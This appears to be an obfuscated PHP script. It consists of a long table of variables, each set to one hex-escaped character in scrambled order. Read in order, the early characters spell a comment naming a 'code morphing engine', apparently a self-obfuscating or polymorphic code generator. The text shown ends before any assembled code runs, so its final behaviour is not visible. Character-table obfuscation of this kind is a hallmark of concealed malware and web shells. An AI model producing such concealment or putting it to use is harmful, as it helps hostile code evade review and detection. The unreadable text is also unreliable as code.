$bfa1005="\x24";
$bfa1385="\x29";$bfa337="\x63";$bfa1201="\x29";$bfa547="\x74";$bfa160="\x6f";$bfa1096="\x0a";
$bfa713="\x65";$bfa1685="\x6e";$bfa534="\x75";$bfa293="\x62";$bfa1131="\x24";$bfa869="\x20";$bfa855="\x6f";
$bfa39="\x28";$bfa525="\x5f";
$bfa605="\x6d";
$bfa1451="\x6e";
$bfa1123="\x0a";$bfa216="\x3b";$bfa1156="\x24";
$bfa918="\x69";$bfa17="\x20";$bfa680="\x25";$bfa8="\x65";$bfa1257="\x09";
$bfa1241="\x20";$bfa339="\x64";$bfa88="\x65";$bfa694="\x3b";$bfa717="\x5b";$bfa305="\x72";$bfa575="\x61";$bfa779="\x32";$bfa953="\x74";$bfa1389="\x09";$bfa1086="\x20";$bfa1658="\x0a";$bfa496="\x6c";$bfa1093="\x3b";$bfa1078="\x0a";$bfa624="\x69";$bfa597="\x29";$bfa892="\x24";$bfa1162="\x24";$bfa882="\x2b";
$bfa863="\x20";$bfa1609="\x20";$bfa1256="\x09";$bfa1498="\x20";$bfa527="\x61";$bfa395="\x68";$bfa1421="\x61";$bfa1639="\x6e";$bfa1659="\x70";$bfa111="\x65";$bfa545="\x69";$bfa1383="\x24";$bfa241="\x72";$bfa1516="\x65";$bfa350="\x7b";
$bfa1134="\x2c";$bfa834="\x2e";$bfa427="\x65";
$bfa219="\x09";$bfa1570="\x6f";$bfa1607="\x6e";$bfa506="\x20";$bfa1463="\x73";$bfa341="\x29";$bfa1448="\x74";$bfa1247="\x24";$bfa755="\x5c";$bfa303="\x73";$bfa885="\x69";$bfa1643="\x2d";$bfa1316="\x24";$bfa1706="\x76";$bfa785="\x29";$bfa702="\x5f";$bfa677="\x24";$bfa145="\x61";$bfa1661="\x69";$bfa939="\x20";$bfa1094="\x0a";$bfa417="\x23";$bfa513="\x61";$bfa1010="\x22";$bfa857="\x20";$bfa388="\x3b";$bfa1027="\x24";
$bfa1282="\x24";$bfa206="\x64";$bfa231="\x29";$bfa1610="\x24";$bfa876="\x72";$bfa1004="\x2e";$bfa1514="\x20";$bfa168="\x69";$bfa372="\x74";$bfa170="\x74";
$bfa1174="\x7b";$bfa1550="\x69";$bfa1563="\x69";$bfa586="\x61";$bfa811="\x20";
$bfa1594="\x72";$bfa1353="\x3b";$bfa252="\x23";$bfa211="\x20";$bfa480="\x20";$bfa50="\x62";
$bfa850="\x22";
$bfa1423="\x64";$bfa217="\x0a";
$bfa280="\x61";$bfa1323="\x74";$bfa1220="\x20";$bfa308="\x74";$bfa899="\x2e";$bfa35="\x69";$bfa118="\x61";$bfa307="\x70";$bfa1502="\x0a";$bfa45="\x30";$bfa1101="\x62";$bfa355="\x75";$bfa73="\x20";$bfa1335="\x3b";$bfa1363="\x20";$bfa1207="\x6e";$bfa1090="\x6f";$bfa639="\x73";
$bfa950="\x28";$bfa645="\x3b";$bfa179="\x20";$bfa615="\x3b";
$bfa1254="\x3b";$bfa1422="\x6e";
$bfa1510="\x74";$bfa1484="\x6d";$bfa638="\x23";$bfa1023="\x3d";$bfa1476="\x65";$bfa349="\x20";$bfa1140="\x20";
$bfa1556="\x69";$bfa15="\x72";$bfa1271="\x3d";
$bfa616="\x0a";$bfa1683="\x3d";$bfa1135="\x20";
$bfa312="\x6f";$bfa743="\x09";$bfa1076="\x0a";$bfa668="\x70";$bfa931="\x20";$bfa1232="\x24";$bfa481="\x73";$bfa925="\x24";$bfa1260="\x61";
$bfa1284="\x5d";
$bfa1071="\x6d";$bfa580="\x6d";$bfa1553="\x0a";$bfa1646="\x65";$bfa1111="\x61";$bfa1171="\x3b";$bfa186="\x6d";$bfa482="\x6f";$bfa798="\x0a";
$bfa780="\x30";$bfa176="\x20";$bfa699="\x76";$bfa795="\x09";$bfa722="\x20";
$bfa1362="\x79";$bfa937="\x6e";$bfa693="\x22";$bfa101="\x72";$bfa1597="\x28";$bfa38="\x20";$bfa881="\x20";
$bfa1437="\x0a";$bfa812="\x65";$bfa22="\x20";$bfa159="\x63";
$bfa102="\x69";$bfa1458="\x23";$bfa1229="\x61";$bfa1113="\x65";$bfa1507="\x6d";$bfa64="\x72";
$bfa1319="\x3d";$bfa742="\x09";$bfa1542="\x65";$bfa1227="\x40";$bfa374="\x28";$bfa731="\x69";$bfa1636="\x61";$bfa1182="\x6a";
$bfa1063="\x24";$bfa682="\x3d";$bfa895="\x6f";$bfa1432="\x29";$bfa1243="\x24";$bfa1350="\x20";$bfa653="\x7b";$bfa1226="\x09";$bfa363="\x69";$bfa1654="\x6e";$bfa1139="\x29";
$bfa573="\x24";$bfa934="\x20";$bfa1371="\x20";$bfa1611="\x6e";$bfa1222="\x6a";$bfa567="\x3d";$bfa1347="\x67";$bfa1173="\x20";$bfa270="\x66";
$bfa503="\x65";$bfa1642="\x65";$bfa1240="\x3d";$bfa1193="\x64";$bfa774="\x72";$bfa494="\x75";$bfa1481="\x65";$bfa1283="\x69";
$bfa153="\x0a";$bfa1651="\x74";$bfa1650="\x61";$bfa244="\x69";
$bfa704="\x61";$bfa352="\x09";
$bfa637="\x24";
$bfa192="\x72";$bfa86="\x20";$bfa917="\x24";$bfa1112="\x74";$bfa903="\x5c";$bfa1486="\x61";$bfa296="\x6c";$bfa1525="\x73";$bfa865="\x3b";$bfa1013="\x0a";$bfa1583="\x6e";$bfa974="\x3b";$bfa700="\x61";$bfa1539="\x20";$bfa1599="\x24";
$bfa455="\x6e";$bfa1408="\x66";
$bfa85="\x31";$bfa1433="\x3b";$bfa538="\x65";$bfa894="\x63";
$bfa975="\x0a";$bfa673="\x66";$bfa1231="\x5b";$bfa935="\x22";$bfa787="\x20";$bfa1368="\x20";$bfa1045="\x09";$bfa549="\x20";
$bfa990="\x22";$bfa141="\x20";$bfa331="\x6e";$bfa1028="\x63";
$bfa245="\x6f";$bfa539="\x28";$bfa166="\x73";$bfa1358="\x72";$bfa1213="\x66";$bfa1011="\x3b";$bfa1500="\x61";$bfa1242="\x40";
$bfa152="\x7b";$bfa1274="\x24";$bfa866="\x20";$bfa875="\x63";$bfa1569="\x70";
$bfa561="\x0a";$bfa1058="\x76";$bfa80="\x74";$bfa820="\x74";$bfa309="\x0a";$bfa1214="\x20";$bfa1120="\x66";
$bfa996="\x76";$bfa1381="\x2b";$bfa543="\x63";$bfa1468="\x72";$bfa128="\x72";$bfa1179="\x79";$bfa1519="\x72";$bfa1341="\x24";$bfa1318="\x20";
$bfa1605="\x72";$bfa1388="\x0a";$bfa1555="\x20";$bfa405="\x2c";$bfa203="\x40";$bfa1538="\x65";
$bfa399="\x6e";
$bfa148="\x72";$bfa662="\x65";
$bfa642="\x69";
$bfa354="\x70";$bfa1579="\x3a";$bfa1400="\x3d";$bfa311="\x66";$bfa1124="\x7b";$bfa1619="\x28";$bfa911="\x61";$bfa1530="\x73";$bfa403="\x65";
$bfa1464="\x20";$bfa1177="\x09";$bfa1513="\x34";$bfa683="\x5c";$bfa302="\x20";$bfa776="\x6e";$bfa518="\x09";$bfa27="\x68";$bfa750="\x20";$bfa201="\x2c";$bfa749="\x65";$bfa1575="\x69";$bfa317="\x69";$bfa1325="\x72";$bfa1128="\x79";$bfa1668="\x6e";$bfa664="\x2e";$bfa822="\x69";$bfa1252="\x69";$bfa1617="\x65";$bfa1150="\x72";
$bfa62="\x6d";$bfa916="\x22";$bfa864="\x30";$bfa1188="\x74";$bfa921="\x3b";$bfa751="\x2e";$bfa555="\x65";$bfa486="\x20";$bfa1269="\x5d";$bfa1301="\x64";$bfa1329="\x28";
$bfa471="\x64";$bfa1334="\x32";$bfa868="\x69";$bfa961="\x30";$bfa115="\x64";$bfa1547="\x65";$bfa1215="\x24";$bfa1703="\x3b";$bfa431="\x72";$bfa1478="\x63";
$bfa517="\x0a";$bfa291="\x68";
$bfa457="\x68";$bfa1562="\x77";$bfa105="\x74";$bfa1030="\x27";$bfa260="\x61";$bfa1223="\x3b";$bfa368="\x73";$bfa1365="\x69";$bfa901="\x20";$bfa944="\x28";$bfa641="\x72";$bfa912="\x6d";
$bfa659="\x63";$bfa1711="\x6e";$bfa709="\x24";$bfa184="\x0a";$bfa1003="\x65";$bfa284="\x72";$bfa948="\x25";$bfa58="\x4b";$bfa768="\x20";$bfa735="\x24";
$bfa402="\x78";$bfa972="\x30";$bfa560="\x3b";$bfa969="\x3d";$bfa821="\x72";$bfa1041="\x3b";
$bfa1186="\x69";$bfa255="\x75";$bfa432="\x69";$bfa1121="\x6c";$bfa1137="\x61";$bfa1277="\x5b";$bfa78="\x72";$bfa65="\x0a";
$bfa1320="\x20";
$bfa1199="\x20";$bfa426="\x7a";$bfa804="\x6c";$bfa1691="\x2b";$bfa760="\x66";$bfa823="\x6e";$bfa472="\x0a";$bfa1529="\x20";$bfa1469="\x65";
$bfa155="\x6d";$bfa1603="\x0a";
$bfa854="\x66";$bfa838="\x5c";$bfa51="\x61";
$bfa1675="\x73";
$bfa267="\x79";$bfa1211="\x20";$bfa727="\x24";$bfa1244="\x61";$bfa1662="\x6e";$bfa1311="\x0a";$bfa893="\x6d";$bfa676="\x5c";
$bfa92="\x6f";$bfa1293="\x0a";$bfa733="\x74";$bfa1366="\x20";
$bfa1313="\x6d";$bfa1673="\x6c";$bfa802="\x63";$bfa1009="\x3b";$bfa849="\x3d";$bfa390="\x09";$bfa565="\x69";$bfa1136="\x24";
$bfa28="\x69";$bfa1571="\x6e";
$bfa164="\x3d";
$bfa1638="\x5f";$bfa281="\x63";
$bfa450="\x61";
$bfa119="\x6c";$bfa1308="\x67";
$bfa487="\x63";$bfa5="\x65";$bfa1152="\x28";$bfa914="\x22";$bfa574="\x76";$bfa454="\x6f";$bfa736="\x69";$bfa1602="\x3b";$bfa859="\x24";$bfa666="\x20";$bfa430="\x63";$bfa1705="\x65";$bfa1198="\x2b";$bfa1470="\x63";$bfa463="\x20";$bfa1689="\x0a";$bfa837="\x22";$bfa1158="\x20";$bfa84="\x2d";$bfa1429="\x39";$bfa631="\x24";$bfa1016="\x6d";$bfa625="\x20";$bfa106="\x73";$bfa1012="\x0a";$bfa1649="\x72";$bfa263="\x61";$bfa1394="\x72";
$bfa276="\x63";$bfa980="\x24";
$bfa1568="\x78";$bfa1255="\x0a";$bfa165="\x20";$bfa1428="\x2b";$bfa358="\x20";$bfa1194="\x28";$bfa375="\x24";$bfa315="\x28";$bfa550="\x5c";$bfa154="\x09";
$bfa511="\x20";$bfa294="\x75";$bfa492="\x65";$bfa172="\x0a";$bfa984="\x64";
$bfa1345="\x69";$bfa1289="\x0a";$bfa501="\x72";$bfa1503="\x23";$bfa421="\x6e";$bfa19="\x6f";$bfa1482="\x2c";$bfa420="\x61";$bfa660="\x6f";$bfa995="\x24";$bfa1693="\x67";$bfa1348="\x20";
$bfa719="\x69";$bfa1512="\x20";$bfa1181="\x24";
$bfa424="\x6d";$bfa63="\x65";$bfa665="\x3d";$bfa208="\x78";
$bfa781="\x29";$bfa994="\x2e";$bfa1424="\x28";$bfa52="\x73";$bfa470="\x65";$bfa687="\x78";
$bfa253="\x20";$bfa287="\x77";
$bfa730="\x72";
$bfa1127="\x6d";$bfa1290="\x7d";$bfa1109="\x5f";
$bfa1190="\x72";$bfa1591="\x61";$bfa32="\x65";$bfa532="\x73";$bfa803="\x61";$bfa194="\x70";$bfa689="\x30";$bfa1414="\x2c";$bfa817="\x29";$bfa382="\x24";$bfa1285="\x3b";
$bfa871="\x20";$bfa1427="\x29";$bfa61="\x68";
$bfa579="\x61";$bfa1494="\x6f";
$bfa1434="\x0a";$bfa634="\x3c";$bfa1270="\x20";$bfa240="\x65";$bfa985="\x65";
$bfa268="\x20";$bfa993="\x22";$bfa258="\x64";$bfa1653="\x6f";
$bfa112="\x72";$bfa195="\x74";$bfa300="\x68";$bfa248="\x3b";$bfa370="\x62";$bfa757="\x22";$bfa1074="\x22";$bfa649="\x24";$bfa1286="\x0a";$bfa515="\x65";$bfa1655="\x22";$bfa1072="\x65";$bfa1629="\x6f";
$bfa913="\x65";$bfa976="\x09";$bfa1279="\x6a";$bfa825="\x0a";$bfa383="\x69";$bfa541="\x40";$bfa269="\x6f";$bfa927="\x63";$bfa205="\x6e";$bfa1266="\x20";$bfa1163="\x61";$bfa1153="\x6d";$bfa129="\x65";$bfa1475="\x76";$bfa1565="\x67";$bfa391="\x09";
$bfa945="\x24";$bfa1036="\x6e";$bfa1495="\x6e";$bfa721="\x2c";$bfa1590="\x74";$bfa72="\x74";$bfa448="\x74";$bfa286="\x20";$bfa113="\x76";$bfa844="\x5f";$bfa304="\x63";$bfa797="\x0a";$bfa890="\x09";$bfa228="\x6d";$bfa970="\x3d";$bfa1700="\x69";$bfa1195="\x24";$bfa1526="\x20";
$bfa1291="\x0a";$bfa1068="\x5f";
$bfa79="\x61";$bfa108="\x72";$bfa418="\x20";$bfa762="\x28";
$bfa648="\x2b";$bfa1349="\x3d";$bfa1332="\x29";$bfa633="\x20";$bfa279="\x72";$bfa1355="\x09";
$bfa1698="\x61";$bfa1146="\x0a";$bfa790="\x20";$bfa1379="\x3b";
$bfa1166="\x20";$bfa1596="\x68";$bfa1606="\x69";$bfa316="\x24";$bfa1572="\x65";$bfa334="\x68";$bfa963="\x2b";$bfa397="\x40";$bfa306="\x69";$bfa929="\x64";$bfa151="\x0a";$bfa840="\x24";$bfa1618="\x6e";$bfa955="\x72";$bfa95="\x23";$bfa183="\x3b";$bfa404="\x73";$bfa1264="\x69";$bfa1249="\x2c";$bfa57="\x20";
$bfa568="\x20";$bfa873="\x23";$bfa1537="\x63";$bfa982="\x63";$bfa1452="\x67";
$bfa1066="\x61";
$bfa1092="\x65";$bfa720="\x5d";
$bfa161="\x64";$bfa146="\x6d";$bfa1025="\x22";$bfa445="\x65";$bfa1288="\x7d";$bfa1436="\x7d";$bfa1443="\x72";$bfa71="\x73";$bfa222="\x61";$bfa1528="\x72";$bfa1601="\x29";$bfa340="\x65";$bfa706="\x65";$bfa1169="\x24";
$bfa1021="\x20";$bfa846="\x61";$bfa429="\x73";$bfa1087="\x24";$bfa1554="\x23";$bfa669="\x72";$bfa928="\x6f";$bfa188="\x20";$bfa613="\x22";$bfa1187="\x6e";
$bfa451="\x63";$bfa1202="\x29";$bfa367="\x20";$bfa581="\x65";$bfa889="\x0a";$bfa400="\x64";$bfa571="\x0a";$bfa1338="\x6d";$bfa461="\x77";
$bfa923="\x09";
$bfa1049="\x6f";$bfa226="\x74";$bfa1015="\x24";$bfa169="\x66";$bfa381="\x20";$bfa477="\x68";$bfa607="\x6f";$bfa842="\x61";$bfa690="\x32";$bfa264="\x72";$bfa831="\x64";$bfa1088="\x6d";$bfa938="\x22";$bfa1702="\x6e";
$bfa654="\x0a";$bfa1561="\x6f";$bfa77="\x65";$bfa249="\x0a";
$bfa1300="\x6e";$bfa416="\x09";$bfa460="\x20";$bfa98="\x6c";
$bfa238="\x65";$bfa530="\x73";
$bfa1558="\x20";$bfa851="\x3b";$bfa814="\x61";$bfa907="\x61";$bfa356="\x73";$bfa843="\x72";$bfa1411="\x25";$bfa229="\x65";$bfa329="\x6c";$bfa100="\x20";$bfa493="\x62";$bfa60="\x61";$bfa1126="\x09";$bfa602="\x79";$bfa34="\x67";$bfa1522="\x69";$bfa353="\x09";$bfa1393="\x74";
$bfa261="\x6e";$bfa710="\x69";$bfa1462="\x69";$bfa583="\x3d";
$bfa909="\x5f";$bfa104="\x68";$bfa213="\x20";$bfa1580="\x29";$bfa124="\x66";$bfa958="\x64";$bfa900="\x3d";$bfa695="\x22";$bfa1059="\x61";$bfa540="\x5c";$bfa1331="\x29";
$bfa135="\x64";
$bfa1409="\x28";$bfa1588="\x6d";
$bfa1444="\x6e";$bfa346="\x24";$bfa1552="\x65";
$bfa576="\x72";$bfa1125="\x0a";$bfa319="\x3d";$bfa663="\x20";$bfa1321="\x69";$bfa1352="\x22";$bfa498="\x20";$bfa1168="\x2d";
$bfa1064="\x24";$bfa940="\x69";$bfa701="\x72";$bfa1148="\x66";$bfa813="\x76";$bfa333="\x74";$bfa1061="\x20";$bfa415="\x0a";$bfa1261="\x32";$bfa1684="\x22";$bfa819="\x73";$bfa466="\x75";$bfa1573="\x6e";$bfa746="\x63";$bfa310="\x09";$bfa357="\x68";$bfa1212="\x69";$bfa1397="\x67";
$bfa1219="\x3d";$bfa259="\x20";$bfa273="\x68";$bfa336="\x24";
$bfa618="\x66";$bfa1485="\x65";$bfa1040="\x27";$bfa898="\x20";$bfa254="\x62";$bfa941="\x66";
$bfa20="\x64";$bfa1185="\x20";$bfa1377="\x24";$bfa409="\x3b";$bfa569="\x30";$bfa1161="\x40";$bfa1082="\x74";$bfa552="\x69";$bfa978="\x0a";
$bfa134="\x65";$bfa608="\x64";$bfa330="\x65";
$bfa1142="\x20";
$bfa968="\x20";$bfa438="\x72";
$bfa103="\x67";
$bfa33="\x6e";$bfa122="\x6c";$bfa942="\x20";$bfa1544="\x63";$bfa1657="\x3b";$bfa1107="\x65";$bfa1493="\x20";$bfa1115="\x5f";$bfa1369="\x30";
$bfa728="\x73";$bfa1069="\x6e";$bfa476="\x74";$bfa1129="\x20";$bfa1184="\x3d";
$bfa698="\x24";$bfa1259="\x24";$bfa278="\x61";
$bfa835="\x3d";$bfa507="\x63";$bfa836="\x20";$bfa1714="\x0a";$bfa1488="\x73";$bfa1543="\x20";$bfa1017="\x63";$bfa828="\x6d";$bfa467="\x66";$bfa598="\x3b";$bfa1165="\x3b";$bfa1663="\x74";$bfa1399="\x2e";$bfa1002="\x6d";
$bfa187="\x79";$bfa732="\x70";$bfa737="\x5d";$bfa290="\x63";$bfa559="\x29";$bfa473="\x09";$bfa1585="\x20";$bfa1564="\x6e";$bfa1339="\x79";$bfa1118="\x75";$bfa716="\x73";$bfa139="\x75";$bfa314="\x20";$bfa578="\x6e";$bfa1346="\x6e";$bfa1245="\x31";$bfa957="\x6e";$bfa943="\x28";
$bfa504="\x63";
$bfa1413="\x22";$bfa529="\x65";$bfa453="\x20";$bfa436="\x61";$bfa887="\x20";$bfa566="\x20";$bfa1417="\x6e";$bfa324="\x24";$bfa1053="\x2e";
$bfa508="\x6f";$bfa1075="\x3b";$bfa800="\x23";$bfa1047="\x6d";$bfa199="\x28";$bfa1209="\x78";
$bfa1205="\x09";$bfa1275="\x61";
$bfa1708="\x6c";$bfa227="\x69";$bfa1141="\x3d";$bfa964="\x31";$bfa7="\x70";$bfa376="\x63";$bfa526="\x79";$bfa1225="\x09";$bfa1280="\x2c";$bfa596="\x28";
$bfa87="\x76";$bfa127="\x20";$bfa753="\x20";
$bfa670="\x69";$bfa384="\x2c";$bfa262="\x20";
$bfa658="\x6d";$bfa130="\x76";$bfa1019="\x64";$bfa1038="\x6d";$bfa1343="\x74";
$bfa1159="\x3d";$bfa1248="\x6a";$bfa16="\x6c";$bfa67="\x20";
$bfa1664="\x20";
$bfa37="\x65";$bfa1589="\x65";$bfa235="\x2a";$bfa140="\x62";$bfa1342="\x73";$bfa1527="\x6f";$bfa218="\x0a";$bfa621="\x20";
$bfa1715="\x0a";$bfa1455="\x7d";$bfa288="\x68";
$bfa1104="\x69";$bfa788="\x3d";$bfa1578="\x20";
$bfa1506="\x6f";$bfa595="\x67";$bfa763="\x28";$bfa99="\x6c";$bfa981="\x6d";$bfa585="\x72";$bfa998="\x72";$bfa1099="\x73";$bfa347="\x69";
$bfa920="\x22";$bfa516="\x72";$bfa979="\x09";
$bfa1200="\x31";$bfa548="\x2c";
$bfa1296="\x62";$bfa672="\x74";
$bfa1454="\x0a";
$bfa348="\x29";$bfa236="\x24";$bfa1357="\x6f";$bfa1656="\x29";$bfa1509="\x75";$bfa18="\x63";$bfa1386="\x20";$bfa562="\x0a";$bfa612="\x20";$bfa962="\x29";$bfa769="\x28";
$bfa1508="\x70";$bfa23="\x6d";$bfa1546="\x64";$bfa207="\x65";
$bfa1667="\x24";$bfa1359="\x20";$bfa1360="\x28";$bfa123="\x65";
$bfa915="\x2e";$bfa1456="\x0a";$bfa131="\x65";$bfa1600="\x63";$bfa1370="\x3b";$bfa147="\x6f";$bfa801="\x20";$bfa1095="\x7d";$bfa1652="\x69";$bfa414="\x0a";$bfa1410="\x22";$bfa1694="\x65";$bfa439="\x61";$bfa1145="\x3b";$bfa285="\x73";
$bfa988="\x3d";$bfa1582="\x24";$bfa1117="\x68";$bfa816="\x28";$bfa1557="\x73";$bfa715="\x65";
$bfa1351="\x22";$bfa1396="\x6e";$bfa1669="\x63";
$bfa650="\x69";$bfa1138="\x32";$bfa705="\x6d";$bfa1006="\x69";
$bfa464="\x73";$bfa1560="\x72";$bfa1100="\x75";$bfa223="\x6e";$bfa1697="\x72";$bfa423="\x6f";$bfa1628="\x6d";$bfa841="\x76";
$bfa242="\x61";$bfa1372="\x24";$bfa328="\x20";$bfa741="\x0a";$bfa1625="\x65";$bfa1679="\x3b";$bfa83="\x6e";$bfa833="\x20";$bfa886="\x29";$bfa1216="\x69";
$bfa251="\x09";$bfa459="\x77";
$bfa215="\x29";$bfa1672="\x63";$bfa282="\x74";$bfa1533="\x20";$bfa832="\x65";$bfa1536="\x6e";$bfa775="\x61";$bfa551="\x40";
$bfa1327="\x6e";$bfa718="\x24";$bfa558="\x73";$bfa1489="\x20";
$bfa951="\x69";$bfa1304="\x74";$bfa1221="\x24";$bfa181="\x20";
$bfa313="\x72";$bfa76="\x6e";$bfa852="\x0a";$bfa991="\x5c";$bfa1581="\x0a";$bfa94="\x0a";$bfa1696="\x65";$bfa1054="\x3d";
$bfa12="\x20";$bfa536="\x66";$bfa1665="\x4f";$bfa1626="\x74";
$bfa1196="\x69";$bfa611="\x3d";$bfa1382="\x2b";$bfa366="\x2c";$bfa425="\x69";$bfa224="\x64";$bfa1709="\x20";$bfa500="\x6f";
$bfa810="\x65";$bfa89="\x72";$bfa933="\x3d";$bfa848="\x65";$bfa136="\x2e";$bfa234="\x24";$bfa144="\x74";$bfa345="\x2b";$bfa1439="\x72";$bfa839="\x24";$bfa570="\x3b";$bfa1298="\x72";
$bfa1197="\x20";$bfa56="\x6e";$bfa1480="\x64";$bfa784="\x29";$bfa1143="\x40";$bfa973="\x29";
$bfa344="\x2b";$bfa1520="\x61";$bfa1144="\x5f";$bfa1278="\x24";$bfa1559="\x67";$bfa992="\x24";$bfa1420="\x72";$bfa655="\x09";$bfa952="\x6e";$bfa1479="\x6f";$bfa708="\x20";$bfa178="\x69";$bfa392="\x70";$bfa752="\x3d";$bfa870="\x3c";$bfa1435="\x09";$bfa827="\x24";$bfa1674="\x6f";$bfa197="\x3d";$bfa465="\x68";$bfa158="\x24";$bfa1110="\x79";
$bfa1233="\x69";$bfa49="\x65";$bfa1501="\x6e";$bfa474="\x23";$bfa1622="\x22";$bfa623="\x24";$bfa173="\x09";$bfa1415="\x20";
$bfa387="\x29";$bfa1057="\x65";
$bfa1170="\x69";$bfa635="\x3d";$bfa862="\x3d";$bfa1330="\x33";$bfa553="\x6e";$bfa1044="\x0a";
$bfa1373="\x69";$bfa1081="\x65";
$bfa1390="\x09";$bfa69="\x6f";
$bfa592="\x72";$bfa497="\x64";$bfa599="\x0a";$bfa412="\x7d";$bfa977="\x7d";$bfa1014="\x09";$bfa1406="\x6e";$bfa1614="\x0a";$bfa490="\x20";$bfa815="\x6c";$bfa1295="\x75";$bfa1541="\x68";$bfa544="\x72";$bfa1326="\x61";
$bfa369="\x75";
$bfa1097="\x0a";$bfa25="\x72";$bfa1682="\x63";
$bfa959="\x28";$bfa82="\x6f";$bfa609="\x65";
$bfa1287="\x09";$bfa1492="\x75";$bfa26="\x70";$bfa292="\x20";$bfa509="\x64";$bfa1640="\x61";$bfa1258="\x40";$bfa1540="\x74";$bfa47="\x20";$bfa1632="\x68";$bfa679="\x73";$bfa724="\x72";$bfa90="\x73";
$bfa485="\x65";$bfa156="\x79";$bfa1692="\x24";$bfa667="\x73";$bfa475="\x20";$bfa986="\x20";$bfa542="\x73";$bfa177="\x24";
$bfa1164="\x31";$bfa91="\x69";$bfa531="\x5f";$bfa1079="\x09";$bfa360="\x73";$bfa512="\x6c";$bfa1407="\x74";$bfa514="\x74";$bfa1149="\x6f";$bfa462="\x65";$bfa1378="\x6c";$bfa808="\x61";
$bfa740="\x3b";$bfa1620="\x4f";$bfa1268="\x6a";$bfa674="\x28";$bfa691="\x78";$bfa163="\x20";$bfa1035="\x5f";$bfa53="\x74";$bfa563="\x09";$bfa406="\x20";$bfa678="\x25";$bfa440="\x79";
$bfa1132="\x61";$bfa1246="\x5b";
$bfa1523="\x6f";$bfa1483="\x20";$bfa1431="\x29";$bfa1644="\x24";
$bfa696="\x2c";$bfa1687="\x22";
$bfa1467="\x20";
$bfa1615="\x6f";$bfa521="\x73";$bfa1593="\x6f";$bfa656="\x09";$bfa1686="\x63";$bfa1403="\x70";$bfa729="\x63";
$bfa1633="\x2d";$bfa644="\x74";
$bfa1306="\x69";
$bfa116="\x2c";$bfa138="\x73";$bfa726="\x28";$bfa1497="\x79";$bfa867="\x24";$bfa1586="\x3d";$bfa1532="\x2c";$bfa1305="\x72";$bfa97="\x41";$bfa739="\x29";$bfa1272="\x20";
$bfa1="\x20";$bfa936="\x5c";
$bfa359="\x40";$bfa1208="\x65";$bfa1050="\x64";$bfa966="\x29";$bfa469="\x6c";$bfa1457="\x0a";$bfa1224="\x0a";$bfa209="\x65";$bfa1052="\x20";
$bfa884="\x24";
$bfa327="\x3c";$bfa361="\x63";$bfa247="\x29";$bfa1361="\x6d";
$bfa1576="\x61";$bfa318="\x20";$bfa1416="\x69";$bfa1192="\x6e";
$bfa435="\x20";$bfa947="\x20";$bfa483="\x20";$bfa2="\x6d";
$bfa1473="\x73";$bfa1175="\x0a";$bfa793="\x3b";$bfa761="\x20";
$bfa967="\x29";$bfa243="\x74";$bfa604="\x24";
$bfa537="\x6c";$bfa180="\x3d";$bfa495="\x69";$bfa1412="\x63";$bfa999="\x5f";
$bfa505="\x74";
$bfa125="\x74";$bfa9="\x61";$bfa1459="\x20";$bfa1450="\x69";$bfa342="\x3b";
$bfa1026="\x5c";$bfa510="\x65";$bfa956="\x61";$bfa1085="\x6e";$bfa756="\x6e";$bfa1446="\x24";$bfa661="\x64";$bfa1453="\x3b";$bfa829="\x63";$bfa1678="\x4f";
$bfa1312="\x09";$bfa1447="\x73";
$bfa1472="\x72";$bfa1154="\x79";
$bfa657="\x24";
$bfa1167="\x2d";$bfa1083="\x75";$bfa385="\x20";$bfa1032="\x76";$bfa237="\x67";$bfa533="\x68";$bfa398="\x69";$bfa932="\x2e";$bfa40="\x43";$bfa48="\x53";$bfa824="\x67";
$bfa30="\x67";
$bfa1367="\x3d";$bfa1265="\x2c";$bfa1055="\x20";$bfa587="\x6e";$bfa1309="\x0a";$bfa167="\x68";$bfa606="\x63";$bfa230="\x28";$bfa1616="\x70";$bfa55="\x61";
$bfa1515="\x67";
$bfa1430="\x37";$bfa1391="\x24";
$bfa1647="\x6e";$bfa274="\x65";$bfa332="\x67";$bfa744="\x24";$bfa1314="\x79";$bfa1020="\x65";
$bfa1191="\x61";$bfa684="\x22";$bfa1276="\x32";$bfa24="\x6f";$bfa1060="\x6c";$bfa1707="\x61";$bfa1535="\x69";$bfa394="\x73";$bfa1364="\x24";$bfa239="\x6e";$bfa902="\x22";
$bfa1344="\x72";$bfa546="\x70";$bfa1108="\x72";
$bfa484="\x77";$bfa46="\x39";$bfa610="\x20";
$bfa1098="\x0a";$bfa1566="\x20";$bfa1419="\x28";$bfa671="\x6e";$bfa906="\x76";$bfa335="\x28";$bfa1122="\x65";$bfa1273="\x40";$bfa707="\x2c";$bfa888="\x7b";$bfa410="\x0a";
$bfa271="\x20";$bfa519="\x66";$bfa908="\x72";$bfa703="\x6e";
$bfa1189="\x28";$bfa1671="\x0a";$bfa1660="\x72";$bfa1302="\x5f";$bfa807="\x6c";$bfa1680="\x0a";$bfa1070="\x61";$bfa806="\x75";$bfa830="\x6f";$bfa1449="\x72";
$bfa930="\x65";$bfa577="\x5f";
$bfa468="\x66";$bfa326="\x20";$bfa1077="\x09";$bfa1549="\x73";
$bfa647="\x2b";$bfa1511="\x65";$bfa1441="\x74";$bfa651="\x29";
$bfa1235="\x20";$bfa926="\x6d";$bfa3="\x6f";$bfa1218="\x3d";$bfa711="\x6e";
$bfa1465="\x69";$bfa1356="\x66";$bfa0="\x23";$bfa121="\x20";$bfa891="\x09";$bfa1712="\x63";$bfa723="\x6f";$bfa232="\x25";$bfa1701="\x6f";$bfa1337="\x09";$bfa1051="\x65";
$bfa189="\x40";$bfa675="\x22";$bfa619="\x6f";
$bfa1524="\x6e";$bfa1151="\x20";$bfa1690="\x2b";$bfa564="\x24";$bfa686="\x5c";
$bfa449="\x72";$bfa246="\x6e";$bfa1251="\x24";$bfa643="\x70";
$bfa491="\x72";$bfa42="\x20";$bfa1073="\x3b";$bfa1442="\x75";$bfa10="\x72";$bfa629="\x3b";$bfa572="\x09";
$bfa960="\x32";$bfa1613="\x3b";$bfa856="\x72";$bfa299="\x74";
$bfa29="\x6e";$bfa874="\x73";$bfa489="\x6e";
$bfa766="\x20";$bfa70="\x6e";$bfa1253="\x5d";
$bfa1322="\x6e";$bfa190="\x73";$bfa759="\x69";$bfa6="\x2d";$bfa442="\x20";$bfa1238="\x5d";$bfa114="\x65";$bfa1037="\x61";$bfa325="\x69";$bfa685="\x5c";$bfa1676="\x65";
$bfa1105="\x73";$bfa1250="\x20";
$bfa174="\x6d";$bfa411="\x09";$bfa1438="\x09";$bfa220="\x73";$bfa502="\x72";$bfa1405="\x69";
$bfa1496="\x6c";$bfa1595="\x70";$bfa408="\x69";$bfa1180="\x20";$bfa1587="\x20";$bfa4="\x72";$bfa1648="\x65";
